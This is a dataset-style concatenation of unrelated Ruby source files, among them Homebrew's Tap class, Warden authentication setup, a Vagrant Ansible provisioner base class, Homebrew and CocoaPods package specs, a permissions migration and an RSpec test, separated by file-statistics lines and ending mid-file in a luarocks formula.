    config["forceautoupdate"] = force_auto_update unless force_auto_update.nil?

    Commands.rebuild_commands_completion_list
    link_completions_and_manpages

    formatted_contents = contents.presence&.to_sentence&.dup&.prepend(" ")
    puts "Tapped#{formatted_contents} (#{path.abv})." unless quiet
    CacheStoreDatabase.use(:descriptions) do |db|
      DescriptionCacheStore.new(db)
                           .update_from_formula_names!(formula_names)
    end

    return if clone_target
    return unless private?
    return if quiet

    puts <<~EOS
      It looks like you tapped a private repository. To avoid entering your
      credentials each time you update, you can use git HTTP credential
      caching or issue the following command:
        cd #{path}
        git remote set-url origin [email protected]:#{full_name}.git
    EOS
  end

  def link_completions_and_manpages
    command = "brew tap --repair"
    Utils::Link.link_manpages(path, command)
    Utils::Link.link_completions(path, command)
  end

  # Uninstall this {Tap}.
  def uninstall
    require "descriptions"

    raise TapUnavailableError, name unless installed?

    puts "Untapping #{name}..."

    abv = path.abv
    formatted_contents = contents.presence&.to_sentence&.dup&.prepend(" ")

    unpin if pinned?
    CacheStoreDatabase.use(:descriptions) do |db|
      DescriptionCacheStore.new(db)
                           .delete_from_formula_names!(formula_names)
    end
    Utils::Link.unlink_manpages(path)
    Utils::Link.unlink_completions(path)
    path.rmtree
    path.parent.rmdir_if_possible
    puts "Untapped#{formatted_contents} (#{abv})."

    Commands.rebuild_commands_completion_list
    clear_cache
  end

  # True if the {#remote} of {Tap} is customized.
  def custom_remote?
    return true unless remote

    remote.casecmp(default_remote).nonzero?
  end

  # Path to the directory of all {Formula} files for this {Tap}.
  def formula_dir
    @formula_dir ||= potential_formula_dirs.find(&:directory?) || path/"Formula"
  end

  def potential_formula_dirs
    @potential_formula_dirs ||= [path/"Formula", path/"HomebrewFormula", path].freeze
  end

  # Path to the directory of all {Cask} files for this {Tap}.
  def cask_dir
    @cask_dir ||= path/"Casks"
  end

  # Human-readable summary of what the tap provides,
  # e.g. ["2 commands", "3 formulae"].
  def contents
    contents = []

    if (command_count = command_files.count).positive?
      contents << "#{command_count} #{"command".pluralize(command_count)}"
    end

    if (cask_count = cask_files.count).positive?
      contents << "#{cask_count} #{"cask".pluralize(cask_count)}"
    end

    if (formula_count = formula_files.count).positive?
      contents << "#{formula_count} #{"formula".pluralize(formula_count)}"
    end

    contents
  end

  # An array of all {Formula} files of this {Tap}.
  def formula_files
    @formula_files ||= if formula_dir.directory?
      formula_dir.children.select(&method(:ruby_file?))
    else
      []
    end
  end

  # An array of all {Cask} files of this {Tap}.
  def cask_files
    @cask_files ||= if cask_dir.directory?
      cask_dir.children.select(&method(:ruby_file?))
    else
      []
    end
  end

  # returns true if the file has a Ruby extension
  # @private
  def ruby_file?(file)
    file.extname == ".rb"
  end

  # return true if given path would present a {Formula} file in this {Tap}.
  # accepts both absolute path and relative path (relative to this {Tap}'s path)
  # @private
  def formula_file?(file)
    file = Pathname.new(file) unless file.is_a? Pathname
    file = file.expand_path(path)
    ruby_file?(file) && file.parent == formula_dir
  end

  # return true if given path would present a {Cask} file in this {Tap}.
  # accepts both absolute path and relative path (relative to this {Tap}'s path)
  # @private
  def cask_file?(file)
    file = Pathname.new(file) unless file.is_a? Pathname
    file = file.expand_path(path)
    ruby_file?(file) && file.parent == cask_dir
  end

  # An array of all {Formula} names of this {Tap}.
  def formula_names
    @formula_names ||= formula_files.map(&method(:formula_file_to_name))
  end

  # An array of all {Cask} tokens of this {Tap}.
  def cask_tokens
    @cask_tokens ||= cask_files.map(&method(:formula_file_to_name))
  end

  # path to the directory of all alias files for this {Tap}.
  # @private
  def alias_dir
    @alias_dir ||= path/"Aliases"
  end

  # an array of all alias files of this {Tap}.
  # @private
  def alias_files
    @alias_files ||= Pathname.glob("#{alias_dir}/*").select(&:file?)
  end

  # an array of all aliases of this {Tap}.
  # @private
  def aliases
    @aliases ||= alias_files.map { |f| alias_file_to_name(f) }
  end

  # a table mapping alias to formula name
  # @private
  def alias_table
    return @alias_table if @alias_table

    @alias_table = {}
    alias_files.each do |alias_file|
      # each alias file is a symlink to the formula file it aliases
      @alias_table[alias_file_to_name(alias_file)] = formula_file_to_name(alias_file.resolved_path)
    end
    @alias_table
  end

  # a table mapping formula name to aliases
  # @private
  def alias_reverse_table
    return @alias_reverse_table if @alias_reverse_table

    @alias_reverse_table = {}
    alias_table.each do |alias_name, formula_name|
      @alias_reverse_table[formula_name] ||= []
      @alias_reverse_table[formula_name] << alias_name
    end
    @alias_reverse_table
  end

  def command_dir
    @command_dir ||= path/"cmd"
  end

  # An array of all commands files of this {Tap}.
  def command_files
    @command_files ||= if command_dir.directory?
      Commands.find_commands(command_dir)
    else
      []
    end
  end

  # path to the pin record for this {Tap}.
  # @private
  def pinned_symlink_path
    HOMEBREW_LIBRARY/"PinnedTaps/#{name}"
  end

  # True if this {Tap} has been pinned.
  def pinned?
    return @pinned if instance_variable_defined?(:@pinned)

    @pinned = pinned_symlink_path.directory?
  end

  # Serializable representation of this {Tap} (e.g. for JSON output).
  def to_hash
    hash = {
      "name"          => name,
      "user"          => user,
      "repo"          => repo,
      "path"          => path.to_s,
      "installed"     => installed?,
      "official"      => official?,
      "formula_names" => formula_names,
      "formula_files" => formula_files.map(&:to_s),
      "cask_tokens"   => cask_tokens,
      "cask_files"    => cask_files.map(&:to_s),
      "command_files" => command_files.map(&:to_s),
    }

    if installed?
      hash["remote"] = remote
      hash["custom_remote"] = custom_remote?
      hash["private"] = private?
    end

    hash
  end

  # Hash with tap formula renames
  def formula_renames
    require "json"

    @formula_renames ||= if (rename_file = path/"formula_renames.json").file?
      JSON.parse(rename_file.read)
    else
      {}
    end
  end

  # Hash with tap migrations
  def tap_migrations
    require "json"

    @tap_migrations ||= if (migration_file = path/"tap_migrations.json").file?
      JSON.parse(migration_file.read)
    else
      {}
    end
  end

  # Taps are equal when their classes and (lowercase) names match.
  def ==(other)
    other = Tap.fetch(other) if other.is_a?(String)
    self.class == other.class && name == other.name
  end

  # Yields every installed {Tap} found under TAP_DIRECTORY.
  def self.each
    return unless TAP_DIRECTORY.directory?

    return to_enum unless block_given?

    TAP_DIRECTORY.subdirs.each do |user|
      user.subdirs.each do |repo|
        yield fetch(user.basename.to_s, repo.basename.to_s)
      end
    end
  end

  # An array of all installed {Tap} names.
  def self.names
    map(&:name).sort
  end

  # An array of all tap cmd directory {Pathname}s
  def self.cmd_directories
    Pathname.glob TAP_DIRECTORY/"*/*/cmd"
  end

  # @private
  def formula_file_to_name(file)
    "#{name}/#{file.basename(".rb")}"
  end

  # @private
  def alias_file_to_name(file)
    "#{name}/#{file.basename}"
  end

  private

  # Reads the cached `homebrew.private` git-config value, or determines it
  # (via the GitHub API) and stores it when not yet set.
  def read_or_set_private_config
    case config["private"]
    when "true" then true
    when "false" then false
    else
      config["private"] = begin
        if custom_remote?
          true
        else
          GitHub.private_repo?(full_name)
        end
      rescue GitHub::HTTPNotFoundError
        true
      rescue GitHub::Error
        false
      end
    end
  end
end
# A specialized {Tap} class for the core formulae.
class CoreTap < Tap
  # @private
  def initialize
    super "Homebrew", "core"
  end

  # The singleton instance of the core tap.
  def self.instance
    @instance ||= new
  end

  # Taps the core tap when it is not already installed.
  def self.ensure_installed!
    return if instance.installed?

    safe_system HOMEBREW_BREW_FILE, "tap", instance.name
  end

  def install(full_clone: true, quiet: false, clone_target: nil, force_auto_update: nil)
    # HOMEBREW_CORE_GIT_REMOTE overrides the clone target for the core tap
    remote = Homebrew::EnvConfig.core_git_remote
    puts "HOMEBREW_CORE_GIT_REMOTE set: using #{remote} for Homebrew/core Git remote URL." if remote != default_remote
    super(full_clone: full_clone, quiet: quiet, clone_target: remote, force_auto_update: force_auto_update)
  end

  # @private
  def uninstall
    raise "Tap#uninstall is not available for CoreTap"
  end

  # @private
  def pin
    raise "Tap#pin is not available for CoreTap"
  end

  # @private
  def unpin
    raise "Tap#unpin is not available for CoreTap"
  end

  # @private
  def pinned?
    false
  end

  # @private
  def core_tap?
    true
  end

  # @private
  def formula_dir
    @formula_dir ||= begin
      self.class.ensure_installed!
      super
    end
  end

  # @private
  def alias_dir
    @alias_dir ||= begin
      self.class.ensure_installed!
      super
    end
  end

  # @private
  def formula_renames
    @formula_renames ||= begin
      self.class.ensure_installed!
      super
    end
  end

  # @private
  def tap_migrations
    @tap_migrations ||= begin
      self.class.ensure_installed!
      super
    end
  end

  # @private
  # Core formulae are named without the tap prefix.
  def formula_file_to_name(file)
    file.basename(".rb").to_s
  end

  # @private
  def alias_file_to_name(file)
    file.basename.to_s
  end
end
# Permanent configuration per {Tap} using `git-config(1)`.
class TapConfig
  attr_reader :tap

  def initialize(tap)
    @tap = tap
  end

  # Reads `homebrew.<key>` from the tap's git config.
  # Returns nil when the value is absent/blank or config is unusable.
  def [](key)
    return unless config_usable?

    tap.path.cd do
      Utils.popen_read("git", "config", "--get", "homebrew.#{key}").chomp.presence
    end
  end

  # Writes `homebrew.<key>` into the tap's git config, replacing any
  # previous values. Silently does nothing when config is unusable.
  def []=(key, value)
    return unless config_usable?

    tap.path.cd do
      safe_system "git", "config", "--replace-all", "homebrew.#{key}", value.to_s
    end
  end

  private

  # Config can only be stored when the tap is a git repository and a
  # usable git binary is available.
  def config_usable?
    tap.git? && Utils.git_available?
  end
end
require "extend/os/tap"
| 24.894231 | 118 | 0.663742 |
e917c194be879eeb315cc076088eb5b5e69895d0 | 270 | class Api::ItemSerializer
include FastJsonapi::ObjectSerializer
belongs_to :category
has_many :materials
attributes :name, :price, :description, :adjustable, :recycled, :image, :customizable, :status, :created_at, :updated_at, :size, :category, :materials
end
| 30 | 152 | 0.762963 |
e2f274c0665e4063140bdd63eb1ef0920a74c4ba | 794 | module Octopress
module Filters
if defined?(Jekyll::Hooks)
Jekyll::Hooks.register :site, :post_read do |site|
Octopress::Filters.site = site
end
Jekyll::Hooks.register :post, :pre_render do |post, payload|
excerpted = post.content.match(post.site.config['excerpt_separator'])
payload['excerpted'] = !!excerpted
end
else
require 'octopress-hooks'
# Captures the Jekyll site object at post-read time so the filters
# module can reference it later.
class SiteGrabber < Hooks::Site
  def post_read(site)
    Octopress::Filters.site = site
  end
end

# Flags each post with `excerpted` before rendering, so templates can
# tell whether the excerpt separator appeared in the post body.
class PostHooks < Hooks::Post
  def pre_render(post)
    excerpted = post.content.match(post.site.config['excerpt_separator'])
    post.data.merge!({'excerpted' => !!excerpted})
  end
end
end
end
end
| 23.352941 | 79 | 0.605793 |
7a926afe4889a410982c43efa4c8ee135434a9e9 | 175 | Before("@personalizeevents") do
@service = Aws::PersonalizeEvents::Resource.new
@client = @service.client
end
# Cucumber hook: runs after every scenario tagged @personalizeevents.
After("@personalizeevents") do
  # shared cleanup logic
end
| 19.444444 | 49 | 0.742857 |
b9c5762bddd856362ffe73ef7f0396148f96afac | 1,248 | Rails.application.config.middleware.use Warden::Manager do |manager|
manager.default_strategies :password_form
end
# Warden strategy: authenticates a user from submitted form params via
# AuthenticationService; signals success with the user or fails with a
# generic message (no hint about which credential was wrong).
Warden::Strategies.add(:password_form) do
  def authenticate!
    auth = AuthenticationService.new(params)
    if auth.authenticated?
      success! auth.user
    else
      fail! "Invalid email or password"
    end
  end
end
Warden::Manager.after_set_user do |user, auth|
auth.cookies.signed.permanent[:auth_token] = user.auth_token
Current.user = user
end
Warden::Manager.before_logout do |_user, auth|
auth.cookies.delete(:auth_token)
Current.user = nil
end
module Warden
  # Stores users in the session as a compact [class name, auth token]
  # pair and resolves them back to records on the way out.
  class SessionSerializer
    # @param user [#auth_token] the signed-in user
    # @return [Array(String, String)] class name plus auth token
    def serialize(user)
      [user.class.name, user.auth_token]
    end

    # @param key [Array(Class|String|Symbol, String)] a serialized pair
    # @return [Object, nil] the matching record, if any
    def deserialize(key)
      klass, auth_token = key
      klass = case klass
              when Class then klass
              when String, Symbol then klass.to_s.classify.constantize
              end
      klass.find_by(auth_token: auth_token)
    end
  end

  module Mixins
    module Common
      # Memoized request wrapper for the current Rack env.
      def request
        @request ||= ActionDispatch::Request.new(env)
      end

      def reset_session!
        request.reset_session
      end

      def cookies
        request.cookie_jar
      end
    end
  end
end
| 20.129032 | 68 | 0.654647 |
5d6f4d48545e7348e8efde9cb62224bdf27eb2a3 | 1,488 | class Libmpeg2 < Formula
desc "Library to decode mpeg-2 and mpeg-1 video streams"
homepage "https://libmpeg2.sourceforge.io/"
url "https://libmpeg2.sourceforge.io/files/libmpeg2-0.5.1.tar.gz"
sha256 "dee22e893cb5fc2b2b6ebd60b88478ab8556cb3b93f9a0d7ce8f3b61851871d4"
license "GPL-2.0-or-later"
livecheck do
url "https://libmpeg2.sourceforge.io/downloads.html"
regex(/href=.*?libmpeg2[._-]v?(\d+(?:\.\d+)+)\.t/i)
end
bottle do
rebuild 2
sha256 cellar: :any, arm64_big_sur: "e2f1a24fdb40a15928f35ae84326fab5b8d1293ca2b378aee8e45aab9bb5766c"
sha256 cellar: :any, big_sur: "9f2cfd80d47e975333747fdea41d336071282ae359e9a345835a70611467bd43"
sha256 cellar: :any, catalina: "9a8c812495f38eb0d46bff246c632c5dfd97413b2bc949defd9c5d318b9da439"
sha256 cellar: :any, mojave: "81161223100cfa38704d3194519be5651f4fcb47765b7e99f1d53ce05e433142"
end
depends_on "autoconf" => :build
depends_on "automake" => :build
depends_on "libtool" => :build
depends_on "sdl"
def install
  # Otherwise compilation fails in clang with `duplicate symbol ___sputc`
  ENV.append_to_cflags "-std=gnu89"
  system "autoreconf", "-fiv"
  system "./configure", "--disable-debug", "--disable-dependency-tracking",
                        "--prefix=#{prefix}"
  system "make", "install"
  # Sample source is installed for use by the `test do` block below.
  pkgshare.install "doc/sample1.c"
end
test do
system ENV.cc, "-I#{include}/mpeg2dec", pkgshare/"sample1.c", "-L#{lib}", "-lmpeg2"
end
end
| 36.292683 | 106 | 0.709677 |
33e17c24f979a85a1418783e948e8d0bee7832b5 | 1,599 | #
# Be sure to run `pod lib lint MobDevLib.podspec' to ensure this is a
# valid spec before submitting.
#
# Any lines starting with a # are optional, but their use is encouraged
# To learn more about a Podspec see http://guides.cocoapods.org/syntax/podspec.html
#
Pod::Spec.new do |s|
s.name = 'MobDevLib'
s.version = '0.1.1'
s.summary = 'iOS工具收集,代码复用,加快开发进度!'
# This description is used to generate tags and improve search results.
# * Think: What does it do? Why did you write it? What is the focus?
# * Try to keep it short, snappy and to the point.
# * Write the description between the DESC delimiters below.
# * Finally, don't worry about the indent, CocoaPods strips it!
# s.description = <<-DESC
#网络、多线程、UI、第三方框架
# DESC
s.homepage = 'https://github.com/MobDeveloper163/MobDevLib'
# s.screenshots = 'www.example.com/screenshots_1', 'www.example.com/screenshots_2'
s.license = { :type => 'MIT', :file => 'LICENSE' }
s.author = { 'Mob_Developer' => '[email protected]' }
s.source = { :git => 'https://github.com/MobDeveloper163/MobDevLib.git', :tag => s.version.to_s }
s.requires_arc = true
# s.social_media_url = 'https://twitter.com/<TWITTER_USERNAME>'
s.ios.deployment_target = '8.0'
s.source_files = 'MobDevLib/Classes/**/*'
# s.resource_bundles = {
# 'MobDevLib' => ['MobDevLib/Assets/*.png']
# }
# s.public_header_files = 'Pod/Classes/**/*.h'
# s.frameworks = 'UIKit', 'MapKit'
# s.dependency 'AFNetworking', '~> 2.3'
end
| 33.3125 | 109 | 0.632896 |
21472bd4ecf3435489582cbdea07482c0ce69b61 | 864 | module ServiceAPIUserAuthentication
include ActionController::HttpAuthentication::Token::ControllerMethods
extend ActiveSupport::Concern
included do
before_action :verify_token!
end
# Halts the request with 401 Unauthorized unless a valid API token
# was supplied; otherwise lets the action proceed.
def verify_token!
  return if authorized?

  render_error(
    name: 'Unauthorized',
    message: 'Please provide a valid API token',
    status: :unauthorized,
  )
end
# True when the request carries a bearer token whose owner is the
# ServiceAPIUser authorized for this controller's API.
#
# Fix: an unknown token made find_by_hashed_token return nil, and the
# subsequent `.user_id` call raised NoMethodError instead of failing
# authentication; a missing ServiceAPIUser likewise crashed on `.id`.
# Both cases now simply evaluate as unauthorized.
def authorized?
  authenticate_with_http_token do |token|
    @authenticating_token = AuthenticationToken.find_by_hashed_token(user_type: 'ServiceAPIUser', raw_token: token)
    next false if @authenticating_token.nil?

    service_user = ServiceAPIUser.find_by(authorized_api: self.class.name.deconstantize)
    !service_user.nil? && @authenticating_token.user_id == service_user.id
  end
end
# Renders a JSON error envelope: { errors: [{ error:, message: }] }
# with the given HTTP status.
def render_error(name:, message:, status:)
  payload = { errors: [{ error: name, message: message }] }
  render json: payload, status: status
end
end
| 27 | 117 | 0.721065 |
ac31c90e8f254be218fb3d527143e6d9806dd78c | 1,765 | class SS::Migration20160225000000
# Runs all permission backfills for this migration.
def change
  change_sys
  change_cms
  change_gws
end

# Grants group/role editing permissions to Sys roles that can edit users.
def change_sys
  add_permissions_to_roles(
    Sys::Role, 'edit_sys_users',
    %w(
      edit_sys_groups
      edit_sys_roles
    )
  )
end

# Grants the expanded CMS permission set to Cms roles that can edit users.
def change_cms
  add_permissions_to_roles(
    Cms::Role, 'edit_cms_users',
    %w(
      edit_cms_groups
      edit_cms_roles
      edit_cms_members
      edit_cms_editor_templates
      use_cms_tools
      edit_chorg_revisions
      read_other_workflow_routes
      read_private_workflow_routes
      edit_other_workflow_routes
      edit_private_workflow_routes
      delete_other_workflow_routes
      delete_private_workflow_routes
    )
  )
end

# Grants the expanded groupware permission set to Gws roles that can
# edit users.
def change_gws
  add_permissions_to_roles(
    Gws::Role, 'edit_gws_users',
    %w(
      edit_gws_groups
      edit_gws_roles
      read_other_gws_workflow_routes
      read_private_gws_workflow_routes
      edit_other_gws_workflow_routes
      edit_private_gws_workflow_routes
      delete_other_gws_workflow_routes
      delete_private_gws_workflow_routes
    )
  )
end

private

# Shared helper (the three loops above were identical): appends each of
# +additions+ to the permissions of every +model+ role already holding
# +marker+, skipping duplicates, and saves only records that changed.
def add_permissions_to_roles(model, marker, additions)
  model.where(permissions: marker).each do |item|
    permissions = item.permissions
    additions.each do |name|
      permissions << name unless item.permissions.include?(name)
    end
    # Reassign to make the ODM register the change for dirty tracking.
    item.permissions = permissions
    item.save! if item.changed?
  end
end
end
| 26.742424 | 66 | 0.675354 |
bbfaa52906ff0c96f0b2e4a0201daf59a5a25468 | 10,065 | require_relative "../errors"
require_relative "../helpers"
module VagrantPlugins
module Ansible
module Provisioner
# This class is a base class where the common functionality shared between
# both Ansible provisioners are stored.
# This is **not an actual provisioner**.
# Instead, {Host} (ansible) or {Guest} (ansible_local) should be used.
class Base < Vagrant.plugin("2", :provisioner)
RANGE_PATTERN = %r{(?:\[[a-z]:[a-z]\]|\[[0-9]+?:[0-9]+?\])}.freeze
protected
# Initializes the shared state used while building the ansible-playbook
# invocation: CLI arguments, environment variables, the machines that
# end up in the generated inventory, and the inventory file path.
def initialize(machine, config)
  super
  @command_arguments = []
  @environment_variables = {}
  @inventory_machines = {}
  @inventory_path = nil
end
# Validates that every user-referenced file exists before provisioning,
# so a typo aborts early with a clear error instead of failing mid-run.
def check_files_existence
  check_path_is_a_file config.playbook, :playbook
  check_path_exists config.inventory_path, :inventory_path if config.inventory_path
  # [1..-1] strips the leading "@" of an extra-vars file reference.
  check_path_is_a_file config.extra_vars[1..-1], :extra_vars if has_an_extra_vars_file_argument
  check_path_is_a_file config.galaxy_role_file, :galaxy_role_file if config.galaxy_role_file
  check_path_is_a_file config.vault_password_file, :vault_password if config.vault_password_file
end
# Builds the full `ENV=... ansible-playbook ...` command line as a
# single string suitable for execution through a shell.
def ansible_playbook_command_for_shell_execution
  shell_command = []
  @environment_variables.each_pair do |k, v|
    # These two variables may contain spaces, so they are single-quoted.
    if k =~ /ANSIBLE_SSH_ARGS|ANSIBLE_ROLES_PATH/
      shell_command << "#{k}='#{v}'"
    else
      shell_command << "#{k}=#{v}"
    end
  end
  shell_command << "ansible-playbook"
  shell_args = []
  @command_arguments.each do |arg|
    # Values of these options may contain spaces and must be quoted;
    # extra-vars additionally needs backslashes and quotes escaped.
    if arg =~ /(--start-at-task|--limit)=(.+)/
      shell_args << %Q(#{$1}="#{$2}")
    elsif arg =~ /(--extra-vars)=(.+)/
      shell_args << %Q(%s="%s") % [$1, $2.gsub('\\', '\\\\\\').gsub('"', %Q(\\"))]
    else
      shell_args << arg
    end
  end
  shell_command << shell_args
  # Add the raw arguments at the end, to give them the highest precedence
  shell_command << config.raw_arguments if config.raw_arguments
  shell_command << config.playbook
  shell_command.flatten.join(' ')
end
# Translates the provisioner configuration into ansible-playbook CLI
# arguments shared by both the host and guest provisioners.
def prepare_common_command_arguments
  # By default we limit by the current machine,
  # but this can be overridden by the `limit` option.
  if config.limit
    @command_arguments << "--limit=#{Helpers::as_list_argument(config.limit)}"
  else
    @command_arguments << "--limit=#{@machine.name}"
  end
  @command_arguments << "--inventory-file=#{inventory_path}"
  @command_arguments << "--extra-vars=#{extra_vars_argument}" if config.extra_vars
  @command_arguments << "--sudo" if config.sudo
  @command_arguments << "--sudo-user=#{config.sudo_user}" if config.sudo_user
  @command_arguments << "#{verbosity_argument}" if verbosity_is_enabled?
  @command_arguments << "--vault-password-file=#{config.vault_password_file}" if config.vault_password_file
  @command_arguments << "--tags=#{Helpers::as_list_argument(config.tags)}" if config.tags
  @command_arguments << "--skip-tags=#{Helpers::as_list_argument(config.skip_tags)}" if config.skip_tags
  @command_arguments << "--start-at-task=#{config.start_at_task}" if config.start_at_task
end
# Sets the environment variables shared by both provisioners before
# running ansible-playbook.
def prepare_common_environment_variables
  # Ensure Ansible output isn't buffered so that we receive output
  # on a task-by-task basis.
  @environment_variables["PYTHONUNBUFFERED"] = 1
  # When Ansible output is piped in Vagrant integration, its default colorization is
  # automatically disabled and the only way to re-enable colors is to use ANSIBLE_FORCE_COLOR.
  @environment_variables["ANSIBLE_FORCE_COLOR"] = "true" if @machine.env.ui.color?
  # Setting ANSIBLE_NOCOLOR is "unnecessary" at the moment, but this could change in the future
  # (e.g. local provisioner [GH-2103], possible change in vagrant/ansible integration, etc.)
  @environment_variables["ANSIBLE_NOCOLOR"] = "true" if [email protected]?
  # Use ANSIBLE_ROLES_PATH to tell ansible-playbook where to look for roles
  # (there is no equivalent command line argument in ansible-playbook)
  @environment_variables["ANSIBLE_ROLES_PATH"] = get_galaxy_roles_path if config.galaxy_roles_path
end
# The inventory to use: an explicitly configured inventory_path wins;
# otherwise a "safe" inventory file is auto-generated (once) from the
# Vagrantfile.
def inventory_path
  config.inventory_path || (@inventory_path ||= generate_inventory)
end
# Renders the host_vars entry for a machine as a "k=v k=v" string,
# or nil when no (non-empty) variables are configured.
def get_inventory_host_vars_string(machine_name)
  # Symbol and String keys differ in Ruby, but Vagrant unifies them
  # for a better user experience.
  vars = config.host_vars[machine_name.to_sym] || config.host_vars[machine_name.to_s]

  rendered = case vars
             when Hash then vars.map { |k, v| "#{k}=#{v}" }.join(" ")
             when Array then vars.join(" ")
             when String then vars
             end

  rendered unless rendered.nil? || rendered.empty?
end
# Builds the auto-generated inventory content and writes it out,
# returning the path of the written file.
def generate_inventory
  inventory = "# Generated by Vagrant\n\n"
  # This "abstract" step must fill the @inventory_machines list
  # and return the list of supported host(s)
  inventory += generate_inventory_machines
  inventory += generate_inventory_groups
  # This "abstract" step must create the inventory file and
  # return its location path
  # TODO: explain possible race conditions, etc.
  @inventory_path = ship_generated_inventory(inventory)
end
# Write out groups information.
# All defined groups will be included, but only supported
# machines and defined child groups will be included.
def generate_inventory_groups
  groups_of_groups = {}
  defined_groups = []
  group_vars = {}
  inventory_groups = ""
  # Verify if host range patterns exist and warn
  if config.groups.any? { |gm| gm.to_s[RANGE_PATTERN] }
    @machine.ui.warn(I18n.t("vagrant.provisioners.ansible.ansible_host_pattern_detected"))
  end
  config.groups.each_pair do |gname, gmembers|
    # Normalize the group name and its member list into Strings.
    if gname.is_a?(Symbol)
      gname = gname.to_s
    end
    if gmembers.is_a?(String)
      gmembers = gmembers.split(/\s+/)
    elsif gmembers.is_a?(Hash)
      gmembers = gmembers.each.collect{ |k, v| "#{k}=#{v}" }
    elsif !gmembers.is_a?(Array)
      gmembers = []
    end
    if gname.end_with?(":children")
      # Group-of-groups sections are emitted after plain groups below.
      groups_of_groups[gname] = gmembers
      defined_groups << gname.sub(/:children$/, '')
    elsif gname.end_with?(":vars")
      group_vars[gname] = gmembers
    else
      defined_groups << gname
      inventory_groups += "\n[#{gname}]\n"
      gmembers.each do |gm|
        # TODO : Expand and validate host range patterns
        # against @inventory_machines list before adding them
        # otherwise abort with an error message
        if gm[RANGE_PATTERN]
          inventory_groups += "#{gm}\n"
        end
        # NOTE(review): a member matching RANGE_PATTERN that is also in
        # @inventory_machines would be written twice — confirm intended.
        inventory_groups += "#{gm}\n" if @inventory_machines.include?(gm.to_sym)
      end
    end
  end
  defined_groups.uniq!
  groups_of_groups.each_pair do |gname, gmembers|
    inventory_groups += "\n[#{gname}]\n"
    gmembers.each do |gm|
      inventory_groups += "#{gm}\n" if defined_groups.include?(gm)
    end
  end
  # Emit :vars sections only for groups that were actually defined.
  group_vars.each_pair do |gname, gmembers|
    if defined_groups.include?(gname.sub(/:vars$/, ""))
      inventory_groups += "\n[#{gname}]\n" + gmembers.join("\n") + "\n"
    end
  end
  return inventory_groups
end
# True when extra_vars is a "@file" reference rather than a Hash.
def has_an_extra_vars_file_argument
  extra_vars = config.extra_vars
  extra_vars && extra_vars.kind_of?(String) && extra_vars =~ /^@.+$/
end
# The value passed to --extra-vars: a "@file" reference (JSON or YAML
# file) is passed through verbatim; otherwise the value is expected to
# be a Hash (after config validation) and is serialized to JSON.
def extra_vars_argument
  return config.extra_vars if has_an_extra_vars_file_argument

  config.extra_vars.to_json
end
# Absolute (unix-style) path of the configured galaxy role file.
def get_galaxy_role_file
  Helpers.expand_path_in_unix_style(config.galaxy_role_file, get_provisioning_working_directory)
end
# Directory where galaxy roles are installed: the configured
# galaxy_roles_path when given, otherwise a "roles" directory next to
# the playbook.
def get_galaxy_roles_path
  base_dir = get_provisioning_working_directory
  custom_path = config.galaxy_roles_path
  return Helpers.expand_path_in_unix_style(custom_path, base_dir) if custom_path

  playbook_path = Helpers.expand_path_in_unix_style(config.playbook, base_dir)
  File.join(Pathname.new(playbook_path).parent, 'roles')
end
# Announces in the Vagrant UI which ansible command is about to run;
# the full command line is only shown in verbose mode.
def ui_running_ansible_command(name, command)
  @machine.ui.detail I18n.t("vagrant.provisioners.ansible.running_#{name}")
  if verbosity_is_enabled?
    # Show the ansible command in use
    @machine.env.ui.detail command
  end
end
# True when a non-empty verbosity level has been configured.
def verbosity_is_enabled?
  verbose = config.verbose
  verbose && !verbose.to_s.empty?
end
# Maps the configured verbosity ("v", "vvv", "-vv", ...) to an
# ansible-playbook flag; any stray input falls back to the safe "-v".
def verbosity_argument
  match = config.verbose.to_s.match(/^-?(v+)$/)
  match ? "-#{match[1]}" : '-v'
end
end
end
end
end
| 37.696629 | 115 | 0.594933 |
110cc32020e69ef10fb2927dfcb21b89a6d5f5b3 | 292 | name "docker"
maintainer "OpenStreetMap Administrators"
maintainer_email "[email protected]"
license "Apache-2.0"
description "Installs and configures the docker daemon"
version "1.0.0"
supports "ubuntu"
depends "apt"
| 29.2 | 61 | 0.619863 |
1d8a47f79db20b07304bb6ca3059d3447ab4ea54 | 756 | Pod::Spec.new do |spec|
spec.name = "DeviceIDSdk"
spec.version = "1.1"
spec.summary = "DeviceIDSdk is the client for create device id."
spec.homepage = "https://github.com/webeyemob/DeviceIDSdk"
spec.license = { :type => 'MIT', :file => "LICENSE" }
spec.author = "taurusx"
spec.platform = :ios, "9.0"
spec.source = { :git => "https://github.com/webeyemob/DeviceIDSdk.git", :tag => "#{spec.version}" }
spec.vendored_frameworks = "DeviceIDSdk.framework"
spec.frameworks = 'SystemConfiguration'
spec.weak_frameworks = 'CoreTelephony', 'AdSupport','iAd'
spec.library = 'resolve.9'
spec.pod_target_xcconfig = { 'BITCODE_GENERATION_MODE' => 'bitcode', 'OTHER_LDFLAGS' => '-lObjC' }
end | 50.4 | 107 | 0.640212 |
e2c04254ed83014fcfede92c49e7b076be8634f9 | 1,742 | # frozen_string_literal: true
require 'spec_helper'
# Spec for the cluster-agent creation GraphQL mutation.
RSpec.describe Mutations::Clusters::Agents::Create do
  include GraphqlHelpers

  subject(:mutation) { described_class.new(object: nil, context: context, field: nil) }

  let(:project) { create(:project, :public, :repository) }
  let(:user) { create(:user) }
  let(:context) do
    GraphQL::Query::Context.new(
      query: query_double(schema: nil), # rubocop:disable RSpec/VerifiedDoubles
      values: { current_user: user },
      object: nil
    )
  end

  specify { expect(described_class).to require_graphql_authorizations(:create_cluster) }

  describe '#resolve' do
    subject { mutation.resolve(project_path: project.full_path, name: 'test-agent') }

    context 'without project permissions' do
      it 'raises an error if the resource is not accessible to the user' do
        expect { subject }.to raise_error(Gitlab::Graphql::Errors::ResourceNotAvailable)
      end
    end

    context 'with user permissions' do
      before do
        project.add_maintainer(user)
      end

      it 'creates a new clusters_agent', :aggregate_failures do
        expect { subject }.to change { ::Clusters::Agent.count }.by(1)
        expect(subject[:cluster_agent].name).to eq('test-agent')
        expect(subject[:errors]).to eq([])
      end

      context 'invalid params' do
        subject { mutation.resolve(project_path: project.full_path, name: '@bad_name!') }

        it 'generates an error message when name is invalid', :aggregate_failures do
          # Fix: the payload key is :cluster_agent (as asserted above);
          # :clusters_agent was a typo that made this assertion vacuous.
          expect(subject[:cluster_agent]).to be_nil
          expect(subject[:errors]).to eq(["Name can contain only lowercase letters, digits, and '-', but cannot start or end with '-'"])
        end
      end
    end
  end
end
f7e130c0289ea49c8f325074f6272c82bf34e6e8 | 3,257 | require 'formula'
# Homebrew formula for LuaRocks, the Lua package manager.
class Luarocks < Formula
  homepage 'http://luarocks.org'
  head 'https://github.com/keplerproject/luarocks.git'
